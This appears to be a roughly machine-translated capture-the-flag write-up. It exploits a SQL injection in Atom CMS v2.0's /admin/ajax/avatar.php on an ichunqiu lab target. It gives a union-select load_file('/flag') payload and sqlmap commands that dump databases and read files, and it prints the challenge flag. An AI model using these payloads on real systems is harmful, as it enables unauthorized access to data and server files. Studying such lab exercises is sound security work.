Table of contents
1. Topic
introduce:
Atom CMS v2.0 has sql injection vulnerability in /admin/ajax/avatar.php page
enter the topic;
It was found that the Not Found page thought it was open at first:
I think what we want to visit is /admin/ajax/avatar.php
After accessing is a blank page:
View the front-end source code:
Test the injection point?id=1
The source code has changed:
try id=1'
The source code has not changed:
Verify again id=1 and 1=1
Character injection is correct
Since the flag is not displayed in the library name of the database, we can just report an error and inject it directly.
SQL error injection:
http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=-1 union (select load_file('/flag'))#
id=1 and 1=2 can also be used to display the grammatical error of the id flag
Two, sqlmap stud check flag
Set id=1 to explode the database
python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch -dbs
Although it broke out, there is no flag table
Because the default flag of the i Spring and Autumn Shooting Range is in the root directory, we can directly search for the /flag file:
python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch --file-read "/flag" --dbms mysql
After running out, there will be a directory of sqlmap:
Check it out:
flag{6d6a2570-99f2-402f-aeb2-bb9b6da68247}